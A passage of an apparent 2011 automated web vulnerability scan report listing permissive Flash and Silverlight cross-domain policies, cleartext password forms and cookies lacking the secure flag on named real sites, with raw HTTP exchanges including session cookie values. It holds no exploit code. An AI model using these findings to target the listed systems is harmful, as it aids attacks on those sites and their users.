Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Wed, 11 May 2011 13:13:45 GMT
ETag: "110080-66-4dca8b89"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Tue, 12 Jul 2011 20:39:27 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.12. http://www.gravatar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gravatar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:13 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.13. http://www7.lowes.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www7.lowes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www7.lowes.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 21:30:49 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "13dd40-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=972
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.14. http://blogs.adobe.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://blogs.adobe.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: blogs.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:18 GMT
Server: Apache
Last-Modified: Wed, 03 Feb 2010 03:49:59 GMT
ETag: "12c0a86-d8-47eaa1cc427c0"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*.adobe.com" />

</cross
...[SNIP]...

4.15. http://bstats.adbrite.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 12 Jul 2011 20:40:10 GMT

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

4.16. http://www.apple.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.apple.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.14 (Unix)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=494
Expires: Tue, 12 Jul 2011 18:07:19 GMT
Date: Tue, 12 Jul 2011 17:59:05 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.17. http://www.youtube.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Tue, 12 Jul 2011 20:46:29 GMT
Expires: Tue, 12 Jul 2011 20:46:29 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.18. http://stats.wordpress.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stats.wordpress.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:00 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Wed, 27 Apr 2011 19:01:50 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 5 instances of this issue:

http://b.scorecardresearch.com/clientaccesspolicy.xml
http://metrics.apple.com/clientaccesspolicy.xml
http://mtrcs.popcap.com/clientaccesspolicy.xml
http://stats.adobe.com/clientaccesspolicy.xml
http://stats.wordpress.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 13 Jul 2011 20:46:59 GMT
Date: Tue, 12 Jul 2011 20:46:59 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.2. http://metrics.apple.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.apple.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:59:13 GMT
Server: Omniture DC/2.0.0
xserver: www179
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.3. http://mtrcs.popcap.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mtrcs.popcap.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mtrcs.popcap.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:19 GMT
Server: Omniture DC/2.0.0
xserver: www262
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://stats.adobe.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stats.adobe.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:24 GMT
Server: Omniture DC/2.0.0
xserver: www10
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://stats.wordpress.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stats.wordpress.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:00 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Wed, 18 May 2011 03:55:47 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6. Cleartext submission of password previous next
There are 4 instances of this issue:

http://apps.ccbill.com/
http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
http://apps.ccbill.com/p/developer.html
http://ucc.state.ri.us/loginsystem/login_form.asp

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://apps.ccbill.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://apps.ccbill.com/login.php

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ccbill.com/developers/faq.php
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.3.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 19391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

           <form action="http://apps.ccbill.com/login.php" method="post">
           <table class="no" cellpadding="2" cellspacing="0">
...[SNIP]...
<br />
                   <input type="password" tabindex="2" class="text" name="password" size="18" value="" />
               </td>
...[SNIP]...

6.2. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://apps.ccbill.com/login.php

The form contains the following password field:

password

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 20399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

           <form action="http://apps.ccbill.com/login.php" method="post">
           <table class="no" cellpadding="2" cellspacing="0">
...[SNIP]...
<br />
                   <input type="password" tabindex="2" class="text" name="password" size="18" value="" />
               </td>
...[SNIP]...

6.3. http://apps.ccbill.com/p/developer.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/p/developer.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://apps.ccbill.com/login.php

The form contains the following password field:

password

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:03:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 25506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

           <form action="http://apps.ccbill.com/login.php" method="post">
           <table class="no" cellpadding="2" cellspacing="0">
...[SNIP]...
<br />
                   <input type="password" tabindex="2" class="text" name="password" size="18" value="" />
               </td>
...[SNIP]...

6.4. http://ucc.state.ri.us/loginsystem/login_form.asp previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/loginsystem/login_form.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://ucc.state.ri.us/loginsystem/CheckLogin.asp

The form contains the following password field:

Request

GET /loginsystem/login_form.asp HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/loginsystem/login.asp?FilingMethod=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12492
Content-Type: text/html
Expires: Tue, 12 Jul 2011 00:48:06 GMT
Cache-control: no-cache

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations </title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospace;
   font-size: 8pt;
   color: G
...[SNIP]...
<br>
   <form name="Login_Form" method="post" action="CheckLogin.asp" OnSubmit="return InternetValidation(this)">
    <table border="0" cellpadding="4" cellspacing="0" width="100%">
...[SNIP]...
<td width="76%">
<input type="password" name="PIN" maxlength=4 size="30"
           onMouseOver="window.status='Please enter your PIN Number. If you have forgotten your PIN please contact us at corp_pin@sos.ri.gov.'; return true;"
           onMouseOut ="window.status=''; return true;">
        </td>
...[SNIP]...

7. SSL cookie without secure flag set previous next
There are 115 instances of this issue:

https://www.chase.com/index.jsp
https://admin.ccbill.com/
https://admin.ccbill.com/adminBanners/blank.gif
https://admin.ccbill.com/ccbillLogin.css
https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js
https://admin.ccbill.com/ext-2.2/custom/combos.css
https://admin.ccbill.com/ext-2.2/custom/login.js
https://admin.ccbill.com/ext-2.2/custom/password.js
https://admin.ccbill.com/ext-2.2/ext-all.js
https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css
https://admin.ccbill.com/ext-2.2/resources/images/default/button/btn-sprite.gif
https://admin.ccbill.com/ext-2.2/resources/images/default/form/text-bg.gif
https://admin.ccbill.com/ext-2.2/resources/images/default/form/trigger.gif
https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-c.png
https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-lr.png
https://admin.ccbill.com/ext-2.2/resources/images/default/shadow.png
https://admin.ccbill.com/favicon.ico
https://admin.ccbill.com/images/ccb_AffiliateSystemBanner.gif
https://admin.ccbill.com/images/ccb_AffiliateSystemBkg.jpg
https://admin.ccbill.com/images/ccb_ClientSupportAreaBkg.jpg
https://admin.ccbill.com/images/ccb_LearnMoreBtn.gif
https://admin.ccbill.com/images/ccb_LoginBoxBottom.gif
https://admin.ccbill.com/images/ccb_LoginBoxDiv.gif
https://admin.ccbill.com/images/ccb_LoginBoxLeft.gif
https://admin.ccbill.com/images/ccb_LoginBoxRight.gif
https://admin.ccbill.com/images/ccb_LoginBoxTop.gif
https://admin.ccbill.com/images/ccb_OnlineSupportBox1Bkg.jpg
https://admin.ccbill.com/images/ccb_OnlineSupportBox2Bkg.jpg
https://admin.ccbill.com/images/ccb_OnlineSupportBox3Bkg.jpg
https://admin.ccbill.com/images/ccb_SupportBarBottom.gif
https://admin.ccbill.com/images/ccb_SupportBarDiv.gif
https://admin.ccbill.com/images/ccb_SupportBarLeft.gif
https://admin.ccbill.com/images/ccb_SupportBarRight.gif
https://admin.ccbill.com/images/ccb_System5Banner.gif
https://admin.ccbill.com/images/ccb_System5Bkg.jpg
https://admin.ccbill.com/js/AC_RunActiveContent.js
https://admin.ccbill.com/js/liveChat.js
https://admin.ccbill.com/js/loginJSTools.js
https://admin.ccbill.com/login.cgi
https://admin.ccbill.com/loginIndex.cgi
https://admin.ccbill.com/loginMM.cgi
https://admin.ccbill.com/style/css/ccbill_style.css
https://admin.ccbill.com/style/css/default_style.css
https://admin.ccbill.com/style/css/images/text-bg.gif
https://admin.ccbill.com/style/css/password.css
https://admin.ccbill.com/style/images/bg_img.jpg
https://admin.ccbill.com/style/images/ccbillLogo.jpg
https://admin.ccbill.com/style/images/contactCCBillBtn.png
https://admin.ccbill.com/style/images/email_icon.png
https://admin.ccbill.com/style/images/exclamation_icon.png
https://admin.ccbill.com/style/images/s.gif
https://admin.ccbill.com/style/images/section_bg.png
https://admin.ccbill.com/style/images/warning_icon.png
https://affiliateadmin.ccbill.com/
https://affiliateadmin.ccbill.com/ccbill.css
https://affiliateadmin.ccbill.com/favicon.ico
https://mm.jpmorgan.com/css/menu.css
https://mm.jpmorgan.com/css/morganmarkets.css
https://mm.jpmorgan.com/css/yui/base.css
https://mm.jpmorgan.com/css/yui/button.css
https://mm.jpmorgan.com/css/yui/container.css
https://mm.jpmorgan.com/css/yui/reset-fonts-grids.css
https://mm.jpmorgan.com/css/yui/sprite.png
https://mm.jpmorgan.com/css/yui/tabview.css
https://mm.jpmorgan.com/css/yui/treeview.css
https://mm.jpmorgan.com/favicon.ico
https://mm.jpmorgan.com/images/JPM_logo.gif
https://mm.jpmorgan.com/images/Morgan_Markets_logo.gif
https://mm.jpmorgan.com/images/backgrounds/btn_hover_center_bg.png
https://mm.jpmorgan.com/images/btn_center_bg.gif
https://mm.jpmorgan.com/images/btn_hover_center_bg.gif
https://mm.jpmorgan.com/images/btn_hover_left_side.gif
https://mm.jpmorgan.com/images/btn_hover_right_side.gif
https://mm.jpmorgan.com/images/btn_left_side.gif
https://mm.jpmorgan.com/images/btn_right_side.gif
https://mm.jpmorgan.com/images/icons/attention.gif
https://mm.jpmorgan.com/images/menu_bg_img.jpg
https://mm.jpmorgan.com/index.jsp
https://mm.jpmorgan.com/js/dropdowns.js
https://mm.jpmorgan.com/js/feedback.js
https://mm.jpmorgan.com/js/gecFunctions.js
https://mm.jpmorgan.com/js/menu.js
https://mm.jpmorgan.com/js/personalisation.js
https://mm.jpmorgan.com/js/portalBondIndex.js
https://mm.jpmorgan.com/js/portlet.js
https://mm.jpmorgan.com/js/yui/button-min.js
https://mm.jpmorgan.com/js/yui/connection-min.js
https://mm.jpmorgan.com/js/yui/container-min.js
https://mm.jpmorgan.com/js/yui/element-min.js
https://mm.jpmorgan.com/js/yui/event-delegate-min.js
https://mm.jpmorgan.com/js/yui/selector-min.js
https://mm.jpmorgan.com/js/yui/tabview-min.js
https://mm.jpmorgan.com/js/yui/treeview-min.js
https://mm.jpmorgan.com/js/yui/yahoo-dom-event.js
https://store.popcap.com/payment.php
https://support.ccbill.com/
https://support.ccbill.com/js/ga.js
https://support.ccbill.com/style/css/base.css
https://support.ccbill.com/style/css/consumers.css
https://support.ccbill.com/style/img/background/body.png
https://support.ccbill.com/style/img/background/body_container.png
https://support.ccbill.com/style/img/background/main.png
https://support.ccbill.com/style/img/buttons/btn_search.png
https://support.ccbill.com/style/img/icons/bullet_square_blk.gif
https://support.ccbill.com/style/img/sprites/page_elements.png
https://www.lowes.com/server-status
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js
https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm
https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
https://www.ri.gov/Licensing/renewal/license.php

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

7.1. https://www.chase.com/index.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.chase.com
Path:	/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

